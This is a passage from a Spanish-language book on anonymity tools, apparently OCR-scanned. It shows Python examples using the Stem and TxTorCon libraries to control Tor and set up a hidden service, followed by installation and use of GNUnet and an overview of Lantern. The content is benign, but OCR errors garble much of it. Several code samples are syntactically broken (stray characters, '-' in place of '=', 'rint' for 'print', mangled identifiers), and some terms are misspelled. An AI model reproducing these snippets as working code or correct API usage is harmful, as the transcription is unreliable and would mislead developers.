algo que es especialmente interesante cuando se desarrolla aplicaciones que deben utilizar Tor 
para realizar conexiones hacia Internet o la web profunda. Su instalacion es bastante simple, sobre 
sistemas basados en Linux basta con ejecutar el comando “pip” o “ easyinstall” para instalar la 
libreria sobre la maquina virtual de Python que se encuentra desplegada en el sistema local. 

>sudo pip install stem 
Collecting stem 

Downloading stem-1.4.0. tar.bz2 (1.6MB) 

Building wheels for collected packages: stem 

Running setup.py bdist_wheel for stem 

Stored in directory: /home/adastra/,cache/pip/wheels/80/6d/23/2db8210a00ee425efa 
4f31f4d374214e5325a26901ae57f64a 
Successfully built stem 
Installing collected packages: stem 
Successfully installed stem-1.4.0 


4.4.1.1 Ejemplos del uso de Stem 

A continuation se detallan algunos ejemplos de programas escritos en Python con la libreria “Stem” 
para ensenar su funcionamiento. 

4.4.1.1.1 Conexion a una instancia local 

Una de las primeras actividades que se puede hacer con “Stem” consiste en realizar una conexion 
contra una instancia local, para ello es necesario que el protocolo de control se encuentre activo 
en dicha instancia y ademas, si se utiliza algun mecanismo de autenticacion, se debe indicar en el 
programa. Tal como se ha visto anteriormente, la propiedad de configuracion “ ControlPort ” debe 
indicarse en el fichero “torrc” y ademas, se debe especificar un puerto que sera utilizado para aceptar 


conexiones. 
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from stem.control import Controller 

with Controller.from_port(port = 9051) as controller: 
controller.authenticate(password="password") 
bytes_read = controller. get_info ("traffic/read") 
bytes_written = controller .get_info ("traffic/written") 
print("read %s written %s." % (bytes_read, bytes_written)) 

En este caso concrete, se utiliza la clase “ Controller” para crear una conexion al puerto -‘9051”, 
en donde se espera que se encuentre en ejecucion una instancia con el protocolo de control de Tor. 
Posteriormente, en el caso de que la conexion se pueda establecer correctamente, se procede a 
ingresar una contrasena para realizar el proceso de autenticacion y en el caso de que no sea necesaria 
basta con no especificar el argumento “ password' del metodo “authenticate”. Finalmente se obtienen 
algunos detalles relacionados con el trafico aportado y consumido de la instancia. 

4.4.1.1.2 Listar los circuitos de la instancia 

Es posible crear un script que se encargue de listar todos los circuitos que ha creado la instancia de 
Tor con sus correspondientes nodos. Para ello basta con ejecutar el metodo “ get circuits” sobre un 
objeto de la clase “ Controller” y posteriormente recorrer cada uno de los valores obtenidos. 

from stem import CircStatus 

from stem.control import Controller 

with Controller.from_port(port = 9051) as controller: 
controller.authenticate() 

for circ in sorted(controller.get_circuits()): 
if circ.status != CircStatus.BUILT: 
continue 

print("") 

print (''Identificador: %s - Tipo: %s" % (circ. id, circ .purpose) ) 

for i, entry in enumerate(circ.path): 

fullpath = '+' if (i == len(circ.path) - 1) else '|' 
fingerprint, nickname = entry 

desc = controller.get_network_status (fingerprint. None) 
address = desc.address if desc else 'unknown' 

print(" %s- %s (%s, %s)" % (fullpath, fingerprint, nickname, address)) 

El script anterior es bastante simple, se encarga de obtener todos los circuitos que se han creado en la 
instancia local y en el caso de que el circuito se encuentre construido y en uso, se procede a ensenar 
el identificador y tipo de circuito. Posteriormente, se enumeran los nodos del circuito y de cada uno 
de ellos se obtiene su correspondiente descriptor por medio del metodo “ get network status" del 
objeto “controller”. Finalmente, partiendo de dicho descriptor se obtiene la direccion IP del nodo y 
se ensena por pantalla cada uno de los nodos de cada circuito, indicando para cada uno si se trata de 
un nodo de entrada, intermedio o salida, asi como su fingerprint, nickname y direccion IP. 
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4.4.1.1.3 Verificando repetidores desactualizados en la red 

Con esta libreria es posible hacer consultas a las caches o autoridades de directorio, del mismo 
modo que lo haria cualquier cliente de Tor, pero con la ventaja de que los descriptores recuperados 
pueden ser posteriormente procesados para encontrar repetidores de entrada, intermedios o de salida 
que ejecutan una version de Tor antigua o para hacer incluso pruebas de pentesting. Como se pue e 
apreciar en el siguiente script, se recupera un listado de “ server descriptors partiendo de la clase 
“DescriptorDownloader ”, la cual se encarga de ejecutar una peticion HTTP contra las autoridades 
de directorio con el fin de obtener informacion sobre el ultimo consenso emitido. Posteriormente, se 
recorre dicho listado y se ensena por pantalla las direcciones IP de los repetidores desactualizados 
con sus correspondientes versiones, ademas tambien se ensena informacion de contacto en el caso 
de que se encuentre establecida en el repetidor. 

from stem.descriptor.remote import DescriptorDownloader 
from stem.version import Version 

downloader = DescriptorDownloader() 

for desc in downloader,get_server_descriptors(): 
if desc.tor_version < Version('0.2.O'): 

print desc.address + " - "+str(desc.tor_version) 
if desc.contact: 

print( ' %s' % (desc.contact.decode("utf-8", "replace")) 

Cabe anotar que en este caso concreto, no ha sido necesario el uso de la clase Conti oiler y 
tampoco seria necesario contar con una instancia de Tor en ejecucion, ya que lo que hace el script es 
simplemente obtener los “ server descriptors ” que se encuentran en los ficheros de consenso de as 
autoridades de directorio y posteriormente, verificar la version de cada repetidor registrado. 


4.4.1.1.4 Ejecutando una instancia de Tor programaticamente con Stem 

Otra caracteristica interesante de esta libreria, es que cuenta con funciones para ejecutar una nueva 
instancia de Tor desde un script en Python. Dicha instancia puede ser configurada con las misrnas 
opciones que admite el fichero “torrc” y de esta forma es posible crear programas que inicien o 
detengan la instancia de forma automatica ante eventos o condiciones determinadas. El limco 
requisito es que el sistema donde se ejecuta el programa debe tener el software de Tor correctamente 

instalado. 

import stem.process 
import time 

def logsTorlnstance(log): 
print log 

torConfig = { 'ControlPort' ; '9151', 'SocksPort' : '5000'} 

torProcess = stem.process. launch_tor_with_config (config = torConfig, tor_cmd - /home/ 
adastra/tor-0.2.6.10/src/or/tor", init_msg_handler=_logsTorlnstance) 

time.sleep(5) 
if torProcess > 0: 

rint "TOR Process PXD %s 


%(torProcess.pid) 
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Las funciones principals en Stem que se encargan de crear una nueva instancia de Tor son “launch 
tor y launch_tor_with_config” del modulo "stem.process”, en donde la primera corresponde a 
la ejecucion de una instancia utilizando la ubicacion predefinida del fichero “ torrc” y la segunda 
permite establecer una configuracion personalizada por medio de un diccionario en Python con las 
opciones de configuracion y sus correspondientes valores. 


4.4.2 TxTorCon 

TxTorCon es una implementacion del protocolo de control de Tor desarrollada en lenguaje Python 
y basada en la libreria Twisted. A diferencia de Stem, TxTorCon es una implementacion asfncrona, 
con la cual es posible crear programas reactivos que se encargaran de ejecutar acciones sobre una o 
varias instancias de Tor cuando se producen una lista de eventos predefinidos. 

Su instalacion es muy simple, solamente se requiere tener instalado Python en el ordenador donde 
se planea utilizar y ejecutar utilidades como "pip o "easy_instalP para obtener automaticamente la 
ultima version disponible de la libreria. 

Instalacion de TxTorCon utilizando “pip” 

>sudo pip install txtorcon 
Downloading/unpacking txtorcon 

Downloading txtorcon-0.13.0-py2-none-any.whl (182kB): 182kB downloaded 
Requirement already satisfied (use upgrade to upgrade) : zope. interface>=3.6.1 in 
/usr/local/lib/python2.7/dist-packages (from txtorcon) 

Requirement already satisfied (use —upgrade to upgrade): Twisted>=ll.1.0 in /usr/ 
local/lib/python2.7/dist-packages (from txtorcon) 

Requirement already satisfied (use —upgrade to upgrade) : setuptools in /usr/local/ 
lib/python2.7/dist-packages (from zope.interface>=3.6.l->txtorcon) 

Installing collected packages: txtorcon 
Successfully installed txtorcon 
Cleaning up... 

Instalacion de TxTorCon utilizado “easy instair' 

>sudo easy_install txtorcon 
Searching for txtorcon 

Reading https://pypi.python.org/simple/txtorcon/ 

Best match: txtorcon 0.13.0 

Downloading https://pypi.python.org/packages/source/t/txtorcon/txtorcon- 
0.13.0.tar,gz#md5=6e70a8239ac8fld92f8bf7f8cl9a9606 
Processing txtorcon-0.13.0.tar.gz 

Writing /tmp/easy_install-qqKlMv/txtorcon-0.13.0/setup.cfg 

Running txtorcon-0.13.0/setup.py -q bdist_egg —dist-dir /tmp/easy_install-qqKlMv/ 
txtorcon-0.13.0/egg-dist-tmp-71FABs 
WARNING: not using PyPi over SSH! 

Adding txtorcon 0.13.0 to easy-install.pth file 

Installed /usr/local/lib/python2.7/dist-packages/txtorcon-0.13.0-py2.7.egg 
Processing dependencies for txtorcon 
Searching for Twisted>=ll.1.0 

Reading https://pypi.python.org/simple/Twisted/ 

Best match: Twisted 15.4.0 
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Downloading https://pypi.python.org/packages/source/T/Twisted/Twisted-15.4.0.tar. 
bz2#md5=5337ffb6aeeff3790981a2cd56db9655 
Processing Twisted-15.4.0.tar.bz2 

Writing /tmp/easy_install-b9f4A5/Twisted-15.4.0/setup.cfg 

Running Twisted-15.4.0/setup.py -q bdist_egg —dist-dir /tmp/easy_install-b9f4A5/ 

Twisted-15.4.O/egg-dist-tmp-ltKtgN 

Adding Twisted 15.4.0 to easy-install.pth file 

Installing tap2deb script to /usr/local/bin 

Installing manhole script to /usr/local/bin 

Installing cftp script to /usr/local/bin 

Installing twistd script to /usr/local/bin 

Installing conch script to /usr/local/bin 

Installing pyhtmlizer script to /usr/local/bin 

Installing ckeygen script to /usr/local/bin 

Installing tkconch script to /usr/local/bin 

Installing mailmail script to /usr/local/bin 

Installing trial script to /usr/local/bin 

Installing tap2rpm script to /usr/local/bin 

Installed /usr/local/lib/python2,7/dist-packages/Twisted-15.4.0-py2.7-linux- 
x86_64.egg 

Finished processing dependencies for txtorcon 

Con TxTorCon es posible desarrollar las mismas rutinas que se han explicado anterionnente con 
Stem, sin embargo, tambien permite la creacion de servicios ocultos de forma programatica tal y 
como se indica a continuacion. 


4.4.2.1 Creacion de servicios ocultos con TxTorCon 

TxTorCon se puede utilizar para crear servicios ocultos de forma programatica y aunque es algo que 
tambien se puede hacer con Stem, en esta seccion se explicaran los elementos basicos que se deben 
utilizar cuando se crean componentes con esta libreria. Antes utilizarla, se deben tener bastante 
claros los conceptos basicos sobre la configuracion de servicios ocultos y las propiedades admitidas 
en el fichero “torrc" para su creacion. 

La clase principal para definir la configuracion de la instancia que se va a crear de forma programatica 
es txtorcon.TorConfig la cual como su nombre lo indica, permite establecer la configuracion que se 
utilizara por la instancia que va a ser iniciada desde TxTorCon. La estructura interna de la clase 
txtorcon.TorConfig se basa simplemente en un diccionario compuesto por claves y valores, donde 
las claves corresponden a alguna de las propiedades de configuracion que habitualmente se incluyen 
en el fichero de configuracion “torrc”. 

import txtorcon 
config = txtorcon. TorConfig () 
config.SOCKSPort = 9051 
config. ORPort = 4443 
config. save () 


Como se puede apreciar, el programador debe definir cada valor de configuracion como un atributo 
de un objeto del tipo “ txtorcon.TorConfig ”. 
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Para declarar servicios ocultos en TxTorCon es necesario crear un listado de instancias de la clase 
txtorcon.HiddenService y dicho listado debera ser almacenado en el atributo “ HiddenServices ” de 
la instancia de txtorcon.TorConfig que se ha creado previamente. El siguiente script que se ensefia 
a continuacion servira como ejemplo para ver como se definen los detalles de configuracion basicos 
de servicio oculto. 

import txtorcon 
import functools 
import tempfile 
import os 

from twisted.internet import reactor 
def createTemporal(): 

tempDir = tempfile .mkdtemp (prefix=' torhiddenservice' ) 
reactor.addSystemEventTrigger('before', 'shutdown', functools. 
partial (txtorcon.util .delete_file_or_tree, tempDir)) 
return tempDir 

def configuration (hiddenserviceDir, servicelnterface, 
servicePort=8080, hiddenservicePort=80): 
if hiddenserviceDir is None: 

print " [+] HiddenserviceDir not specified... Generating a temporal file." 
hiddenserviceDir = createTemporal() 
if os.path.exists(hiddenserviceDir) == False: 

print " [ + ] The HiddenserviceDir specified does not exists... Generating a 
temporal file." 

hiddenserviceDir = createTemporal!) 
config = txtorcon. TorConfig () 
config. SOCKSPort = 9051 
config. ORPort = 4443 

config.HiddenServices = [txtorcon.HiddenService (config, hiddenserviceDir, ["%s 
%s:%s" %(str(hiddenservicePort), servicelnterface, str(servicePort))] )] 
config.save () 
return config 

configuration (hiddenserviceDir-' /home/adastra/Escritorio/django-hiddenservice' , 
servicelnterface-'127.0.0.1', servicePort-8000, hiddenservicePort=80) 

La funcion declarada con el nombre “ configuration” es la primera que se ejecuta en el script y 
recibe por parametros todos los elementos necesarios para establecer un servicio oculto con la 
configuracion definida en el objeto “ txtorcon. TorConfig ” y posteriormente dicho objeto es retomado. 

Por otro lado, la funcion “ createTemporaP es invocada intemamente por la funcion “ configuration ” 
con el fin de devolver un directorio temporal para el servicio oculto en el caso de que el directorio 
indicado por parametro sea invalido. Ahora que la configuracion se encuentra preparada, el siguiente 
paso consiste en utilizarla para iniciar la instancia de Tor en cuestion. 

import txtorcon 
import functools 
import tempfile 
import os 
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from twisted.internet import reactor 
def createTemporal(): 

tempDir = tempfile .mkdtemp (prefix='torhiddenservice') 
reactor.addSystemEventTrigger('before', 'shutdown', functools. 
partial (txtorcon.util.delete_file_or_tree, tempDir)) 
return tempDir 

def configuration(hiddenserviceDir, servicelnterface, servicePort=8080, hiddenser- 
vicePort=80): 

if hiddenserviceDir is None: 

print "[+] HiddenServiceDir not specified... Generating a temporal file." 
hiddenserviceDir = createTemporal() 
if os.path.exists(hiddenserviceDir) == False: 

print "[+] The HiddenserviceDir specified does not exists... Generating a 
temporal file ." 

hiddenserviceDir = createTemporal() 
config = txtorcon. TorConfig () 
config. SOCKSPort = 9051 
config. ORPort = 4443 

config.HiddenServices = [txtorcon.HiddenService (config,hiddenserviceDir, ["%s 
%s:%s" %(str(hiddenservicePort),servicelnterface, str(servicePort))] )] 

config.save () 
return config 

def updates(prog, tag, summary): 

print "%d%%: %s" % (prog, summary) 

def setup_complete (config, proto): 
print "Tor Instance started!" 

def setup_failed(arg): 

print "SETUP FAILED", arg 
reactor.stop() 

def startTor (config) : 

d = txtorcon. launch_tor (config, reactor,progress_updates=updates) 
d.addCallback (functools.partial (setup_complete, config)) 
d.addErrback(setup_failed) 
reactor.run () 

torrc = configuration (hiddenserviceDir=' /home/adastra/Escritorio/dj ango-hiddenser- 
vice', servicelnterface^'127.0.0.1', servicePort=8000, hiddenservicePort=80) 
startTor(torrc) 


En esta nueva version del script se ha incorporado la funcion “ startTor ”, la cual se encarga de utilizar 
la configuracion retomada por la funcion “ configuration ” para crear una nueva instancia de Tor. 
Como se puede apreciar, dentro de la funcion ‘‘‘’startTor''' se ejecuta la utilidad txtorcon.launch tor 
enviando como argumentos, la configuracion de Tor, un objeto “ reactor ” que se encuentra incluido 
en la libreria Twisted y una funcion que se ejecutara automaticamente para procesar cada uno de los 
eventos producidos durante proceso de inicio. Finalmente, se adicionan dos funciones mas en el caso 
de que el proceso de arranque haya ido bien o en el caso de fallo. 
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•' i 

adastra£Galilei:-/Escritorio$ python testing.py 

5%: Connecting to directory server 

16V Finishing handshake with directory server 

15V Establishing an encrypted directory connection 

2&V Asking for networkstatus consensus 

25%: Loading networkstatus consensus 

40%: Loading authority key certs 

45%: Asking for relay descriptors 

50%: Loading relay descriptors 

51%: Loading relay descriptors 

52%: Loading relay descriptors 

53%: Loading relay descriptors 

54%: Loading relay descriptors 

55%: Loading relay descriptors 

56%: Loading relay descriptors 

57%: Loading relay descriptors 

58%: Loading relay descriptors 

59%: Loading relay descriptors 

60%: Loading relay descriptors 

61%: Loading relay descriptors 

62%: Loading relay descriptors 

63%: Loading relay descriptors 

64%: Loading relay descriptors 

65%: Loading relay descriptors 

66%: Loading relay descriptors 

67%: Loading relay descriptors 

69%: Loading relay descriptors 

70%: Loading relay descriptors 

72%: Loading relay descriptors 

74%: Loading relay descriptors 

75%: Loading relay descriptors 

77%: Loading relay descriptors 

78%: Loading relay descriptors 

80%: Connecting to the Tor network 

85%: Finishing handshake with first hop 

90%: Establishing a Tor circuit 

100%: Done 

TOR Instance started! _ 

Imogen 04.30: Iniciando una instancia de Tor con un servicio oculto configurado. 

Con las instrucciones del script anterior se tiene suficiente para contar con un servicio oculto en la 
web profunda de Tor, sin embargo, tambien es necesario que en la maquina local exista un servicio 
iniciado y esperando conexiones en el puerto “8000", el cual se ha enviado como parametro de la 
funcion “ configuration En este caso es posible arrancar un servidor web en el puerto 8000, pero 
dadas las caracteristicas de la libreria Twisted, es posible crear un servidor web simple de forma 
programatica. Utilizando la API de Twisted se procede a modificar la funcion “ startTor ” con el fin 
de iniciar un servidor web al tiempo que se crea y configure el servicio oculto. Las modificaciones 

se listan a continuacion. 

def startTor (config) : 

from twisted.web import static, resource, server 
from twisted.internet import reactor 

from twisted.internet.endpoints import TCP4ServerEndpoint 


♦Starting a simple web site. 

root = static.File(Vhome/adastra/WebSite') 
site = server.Site(root) 

hs_endpoint = TCP4ServerEndpoint(reactor, 8080,interface-'127.0.0.1') 
hs_endpoint.listen(site) 

d = txtorcon.launch_tor (config, reactor,progress_updates=updates) 
d. addCallback (functools.partial (setup_complete, config) ) 
d.addErrback(setup_failed) 
reactor.run() 

En la funcion “ startTor ” solamente se anaden los componentes necesarios para declarer un servidor 
web cuyo directorio raiz es “/home/adastra/WebSite” . Dicho servidor web se levantara en el puerto 
“8080” en la interfaz de red local, tal como se ha declarado en la configuration del servicio oculto. 
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Capitulo V 

Otras soluciones enfocadas a la 
privacidad y el anonimato 


Aunque sin lugar a dudas las soluciones expuestas en los capitulos anteriores son las mas conocidas 
y robustas, existen otras herramientas que intentan mejorar la privacidad de los usuarios con 
fimcionalidades muy bien disenadas. El objetivo de este capitulo es dar a conocer algunas de estas 
soluciones y su funcionamiento general, las cuales dadas sus caracteristicas, merece la pena conocer 
y entender. No obstante, muchas de las soluciones que se explicaran a continuacion no tienen una 
comunidad ni un equipo de desarrolladores tan extenso como las redes anonimas mencionadas 
en capitulos previos e incluso, en algunos casos, se trata de soluciones que ya no se encuentran 
en desarrollo y no son consideradas lo suficientemente solidas o robustas como para aportar unos 
niveles de privacidad y anonimato adecuados. Aun asi, resultan interesantes desde el punto de vista 
funcional y dado que son soluciones abiertas, cualquier persona con los conocimientos y deseos de 
retomar dichos proyectos puede hacerlo sin ningun impedimento. Por otro lado, algunas de las redes 
que se indican a continuacion son previas a otras tan antiguas como I2P o FreeNet y han moldeado 
las bases funcionales de las redes anonimas mas populares y difundidas, esta es otra de las razones 
por las que puede ser interesante conocer como funcionan estas herramientas. 


5.1 GNUnet 

Se trata de una de las primeras soluciones que ha comenzado a utilizar un modelo descentralizado 
en el que cada nodo de la red funciona como un enrutador en si mismo. Es una red del tipo “peer- 
to-peer” cuyo desarrollo data del ano 2001 y a la fecha de redactar este documento, aun siguen 
saliendo versiones con mejoras y nuevas funcional idades. Se trata de uno de los proyectos mas 
importantes del “GNU Project” en materia de privacidad y confidencialidad en la informacion. El 
objetivo principal de GNUnet siempre ha sido el de proveer un repositorio de almacenamiento 
descentralizado que permita a sus integrantes compartir documentos de forma anonima, privada y 
resistente a la censura. 

El desarrollo inicial de dicha solucion ha sido vital para las soluciones “ inproxy ” que se han explicado 
en capitulos anteriores, de hecho, en gran medida gracias a GNUnet, se han podido asentar las 
bases funcionales de conceptos tan importantes como el “ DataStore ” y los grupos de “ Darknets ” en 
Freenet, asi como el uso del algoritmo Kademlia para la gestion de la base de datos distribuida de 
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I2P, tambien conocida como “ NetDB ”. Aunque GNUnet ha comenzado siendo una red con el claro 
objetivo de compartir documentos de forma anonima y privada, durante todos sus anos de desarrollo 
se han ido incorporado multiples caracteristicas que han extendido sus funcionalidades mucho mas 
alia de la comparticion de documentos. Entre otras cosas, cuenta con supropio sistema de resolucion 
de nombres, el cual se basa en el GNS (GNU Name System). 

Este sistema no es en realidad un sustituto de DNS, sino que aprovecha las funciones basicas de 
dicho protocolo para extender sus funcionalidades y en el que cada uno de los integrantes de la red 
tiene su propia zona maestra, la cual se encuentra mapeada en un namespace con el TLD “.gnu”. 
Posteriormente, los usuarios utilizan GNS para realizar busquedas de registros contra la tabla hash 
distribuida de GNUnet (DE1T). 

5.1.1 Instalacion 

El proceso de instalacion de GNUnet requiere como minimo las siguientes dependencias, algunas de 
las cuales es necesario instalar manualmente desde codigo fuente y otras se encuentran disponibles 
en los principales repositories de distribuciones tales como Debian, Fedora o CentOS. 

ibgcrypt 
libnettle 
libunbound GnuTLS 
libgnurl 

GNU libmicrohttpd 
GNU libextractor 
libgpgerror 

En el caso de instalar GNUnet en un sistema basado en Debian, se pueden instalar directamente con 
el siguiente comando: 

apt-get install libltdl-dev libgpg-error-dev libidnll-dev libunistring-dev libgl- 
pk-dev libbluetooth-dev libextractor-dev libmicrohttpd-dev libgnutls28-dev 

Por otro lado, GNUnet necesita una base de datos para su correcto funcionamiento, una dependencia 
facil de cumplir si se instala una base de datos PostgreSQL, MySQL o SQLite. 

Aunque estas dependencias son basicas, dependiendo de la distribucion utilizada, es posible que 
sean necesarios algunos paquetes adicionales o que no se encuentren disponibles en los repositories 
oficiales de la distribucion en cuestion. Por este motivo, es recomendable revisar detenidamente la 
guia de instalacion especifica de GNUnet para la plataforma objetivo. Dichas guias se encuentran 
disponibles en el sitio web oficial de GNUnet en: https://gnunet.org/installation 

Una vez cumplidas todas las dependencias necesarias, se precede a instalar GNUnet de la siguiente 
forma, tal como se puede apreciar, es un procedimiento estandar sin ninguna dificultad. 

>wget http://ftpmirror.gnu.org/gnunet/gnunet-0.10.1.tar.gz 
>tar xvf gnunet-0.10.1.tar.gz 
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>cd gnunet-0.10.1 

>. /configure —prefix=/opt/adastra/gnunet 
>make 

>sudo make install 


Tambien es recomendable instalar la aplicacion “ gminet-gtk” para gestionar el servicio desde una 
interfaz grafica. 

>wget http://ftpmirror.gnu.org/gnunet/gnunet-gtk-0.10.1.tar.gz 
>tar xvf gnunet-gtk-0.10.1.tar.gz 
>cd gnunet-gtk-0.10.1/ 

>. /configure —with-gnunet=/opt/adastra/gnunet 
>make 

>sudo make install 


Antes de iniciar el nodo de GNUnet, es necesario crear un fichero de configuracion que se debera 
ubicar en “~/.config/gnimet.conf\ Finalmente, se puede iniciar el nodo de GNUnet ejecutando el 
siguiente comando. La opcion “-c” permite indicar una ubicacion distinta del fichero de configuracion 
“gnunet.conf’. 

,/gnunet-arm -s 


Para comprobar que la instalacion ha sido satisfactoria, es recomendable ejecutar la utilidad “gnunet- 
gtk”, la cual ensena cinco secciones distintas para consultar el comportamiento del nodo y verificar 
el trafico que pasa por las interfaces de red de la instancia de GNUNet. 



Si el nodo se encuentra correctamente instalado, se podra apreciar movimiento en el numero de 
conexiones y el trafico que maneja la instancia de GNUNet. 
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5.1.2 Publication y consulta de ficheros en GNUNet 

Una de las caracteristicas mas relevantes en GNUNet, es precisamente la posibilidad de compartir 
directorios y ficheros de forma anonima en la red. Cualquier nodo tiene la posibilidad de subir 
documentos y descargarlos facilmente, sin embargo el sistema de busqueda y comparticion de 
archivos en esta red no es tan sencillo como en los sistemas de intercambio convencionales y sigue 
un rnodelo bastante similar a otras redes como Freenet, en donde se utilizan diferentes algoritmos 
criptograficos para referenciar y distribuir ficheros con identificadores unicos. 


En GNUNet, todos los contenidos que se comparten en la red son divididos en trozos con tamanos 
fijos, los cuales son distribuidos en diferentes puntos de la red sin permitir que los participantes 
puedan corromper dichos ficheros. El proceso de publicacion no es complejo y puede llevarse a 
cabo ejecutando la utilidad “ gnunet-publish ''\ la cual se encuentra junto con todas las utilidades 
disponibles en un nodo de GNUNet. 


Cuando un usuario decide publicar un contenido, tiene la posibilidad de especificar palabras clave 
sobre el contenido, lo que le permitira a otros usuarios en la red realizar busquedas y acceder a 
dicho contenido. No obstante, dicho proceso de busqueda es el mas simple que se puede realizar en 
GNUNet y las palabras clave son sensibles de mayusculas y minusculas y tienen que coincidir de 
forma exacta. Como se ha mencionado anteriormente, la utilidad “ gnunet-publish ” permite publicar 
contenidos en la red. Las opciones de las que dispone se listan a continuation: 


./gnunet-publish —help 
gnunet-publish [OPTIONS] FILENAME 
Publish a file or directory on GNUnet 

Arguments mandatory for long options are also mandatory for short options. 

-a, —anonymity=LEVEL set the desired LEVEL of sender-anonymity 

-c, —config=FILENAME use configuration file FILENAME 

-D, —disable-extractor do not use libextractor to add keywords or metadata 

-d, —disable-creation-timedisable adding the creation time to the metadata of 
the uploaded file 

-e, —extract print list of extracted keywords that would be used, 

but do not perform upload 

-h, —help print this help 

-k, —key=KEYWORD add an additional keyword for the top-level file or 

directory (this option can be specified multiple times) 

-L, —log=LOGLEVEL configure logging to use LOGLEVEL 

-1, —logfile=LOGFILE configure logging to write logs to LOGFILE 

-m, —meta=TYPE:VALUE set the meta-data for the given TYPE to the given 

VALUE 


-N, —next=ID specify ID of an updated version to be published in 

the future (for namespace insertions only) 

-n, —noindex do not index, perform full insertion (stores entire 

file in encrypted form in GNUnet database) 


-P, —pseudonym=NAME 
into namespace) 

-p, —priority=PRIORITY 
-r, —replication=LEVEL 
-s, —simulate-only 
publishing (useful to compute URIs) 


publish the files under the pseudonym NAME (place file 

specify the priority of the content 
set the desired replication LEVEL 

only simulate the process but do not do any actual 
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_t, —this=ID set the ID of this version of the publication (for 

namespace insertions only) 

_ Uj —uri=URI URI to be published (can be used instead of passing a 

file to add keywords to the file with the respective URI) 

-V, —verbose be verbose (print progress information) 

-v, --version print the version number 

Para publicar un fichero de texto, se puede ejecutar el siguiente comando: 

>./gnunet-publish -n -a 1 -k passwords /home/user/Escritorio/passwords 
Publishing '/home/adastra/Escritorio/passwords' done. 

URI is -gnunet://fs/chk/NORKGQlLQDQDBJM16CM3FBKH81AHCFQFG34RIKNC3BNKHN2RUV5F8E- 
4FO5NVNJBFONECHLT40533GPBOV8LTU1P8ANE6VPM3EB6B1 JO. HKPL422LLR97UN4LA55AIV85QJA7B- 
3CQHRNE45KUOK96VITEM4Q4P8BJE18AVNA4PQKRIEOKIL5HIFA77H9OHL6EB31RNRT2GQ3LNQ0.46'. 

En este caso concreto, se ha especificado una palabra clave para el fichero de texto y el resultado 
ha sido una URI que representa el identificador unico del fichero en la red. Dicho identificador 
evidentemente, puede ser utilizado para descargar directamente el contenido. 

Para realizar una busqueda de contenidos, es posible hacerlo desde “ gminet-gtk ” o por medio de la 
utilidad "gnunet-search". 

./gnunet-search -t 0 passwords 
#0: 

gnunet-download -o "passwords" gnunet://fs/chk/N0RKGQlLQDQDBjM16CM3FBKH81AHCFQF- 
G34RIKNC3BNKHN2RUV5F8E4FO5NVNJBFONECHLT40533GPBOV8LTU1P8ANE6VPM3EB6B1 JO.HKPL422LL- 
R97UN4LA55AIV85QJA7B3CQHRNE45KUOK96VITEM4Q4P8BJE18AVNA4PQKRIE0KIL5HIFA77H9OHL6E- 

B31RNRT2GQ3LNQ0.46 

En este caso concreto, se puede apreciar que la busqueda se ha realizado utilizando la palabra clave 
“ passwords ” y ademas, con la opcion “-t” se ha especificado un valor para el timeout de la busqueda, 
el cual en este caso es “0”. Este mismo resultado se puede obtener utilizando “ gnunet-gtk ”, tal como 
se ensefia en la siguiente imagen. 
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Para descargar el fichero partiendo de la URI descubierta en el proceso de busqueda, se puede 
ejecutar la utilidad “ gnunet-download ” tal como se ensefia a continuacion. 

./gnunet-download -o /home/adastra/PASS — gnunet://fs/chk/NORKGQlLQDQDB- 
JM16CM3FBKH81AHCFQFG34RIKNC3BNKHN2RUV5F8E4FO5NVNJBFONECHLT40533GPBOV8LTU- 
1P8ANE6VPM3EB6B1JO.HKPL422LLR97UN4LA55AIV85QJA7B3CQHRNE45KUOK96VITEM4Q4P8B- 
JE18AVNA4PQKRIEOKIL5HIFA77H9OHL6EB31RNRT2GQ3LNQ0.46 
10 0 % [====================================================== ] 

Downloading '/home/adastra/PASS' done (56 b/s). 

Con la opcion “-o” se especifica la ubicacion donde se almacenara el fichero descargado con la clave 
indicada. 


5.2 Lantern 

Se trata de una solucion P2P que permite la evasion de las medidas de censura que intentan 
bloquear secciones de Internet. El software es capaz de detectar si un sitio se encuentra bloqueado 
y posteriormente, permite el acceso a dicho sitio por medio de una red distribuida de usuarios que 
utilizan Lantern y que tienen libre acceso a Internet, asi como tambien por medio de servidores 
dedicados que son gestionados directamente por el equipo de Lantern. 

En este sentido, los usuarios en Lantern comparten un poco de su ancho de banda para que aquellas 
personas con restricciones de acceso puedan evadir las medidas de censura que tienen impuestas en el 
pais donde se encuentran, no obstante, aunque tiene varias similitudes con soluciones de anonimato 
como Tor, Lantern no es una solucion enfocada al anonimato sino que su principal objetivo es el de 
permitir el acceso de forma rapida y segura a sitios bloqueados. Por otro lado, en el caso de que el 
sitio al que intenta acceder el usuario, no tenga ningun tipo de restriccion o bloqueo, dicho acceso es 
directo y no se utiliza la red de Latem para resolver la peticion del usuario. 

Finalmente, hay que tener en cuenta que los usuarios que hacen parte de la red de Lantern tienen la 
posibilidad de ver el origen y el destino de una peticion dada, aunque el contenido de dichas peticiones 
viaja cifrado utilizando protocolo HTTPS. Por este motivo, Lantern no puede considerarse como 
una solucion enfocada al anonimato, pero es una estupenda herramienta para acceder rapidamente a 
sitios en Internet que se encuentran bloqueados por el ISP o un gobiemo censor. 

El proceso de instalacion es bastante trivial y no requiere ningun procedimiento especial, simplemente 
es necesario descargar la ultima version disponible desde https://getlantem.org/ y a continuacion, 
ejecutar el software correspondiente. Lantern es un proyecto de codigo abierto y con compilaciones 
para mriltiples plataformas, las cuales se pueden encontrar en el repositorio Github: https://github. 
com/getlantem/lantem. Ademas, tambien se encuentran las instrucciones para compilar el programa 
desde codigo fuente y generar un binario de Lantern utilizando la ultima version disponible en 
el repositorio.Una vez instalado el programa, se puede acceder a su configuration ingresando en 
http://l 27.0.0.1:16823/ 










Imogen 05.03: Ini erfaz principal de Lantern. 


En el extremo inferior derecho es posible establecer algunos valores de configuration, concretamente 
se puede indicar que Lantern debe ejecutarse cuando arranca el sistema, servir como proxy para todo 
el trafico saliente y enviar reportes anonimos sobre las estadisticas de uso de Lantern. 

O Settings — 

App ■ Run Lantern automatically on system start 

Proxy ail traffic 

■ Securely report anonymous usage statistics to 
contribute to Lantern more info 


Close 


Imogen 05.04: Opciones de configuracion de Lantern. 

A partir de este punto, el uso de Lantern es transparente, el usuario puede seguir navegando por 
Internet y en el caso de que sea detectado un sitio bloqueado, automaticamente se encargara de 
utilizar la red de Lantern para evadir dicho bloqueo utilizando el ancho de banda de otro usuario en 
la red que tiene acceso no restringido al sitio en cuestion. 


5.3 YaCy 

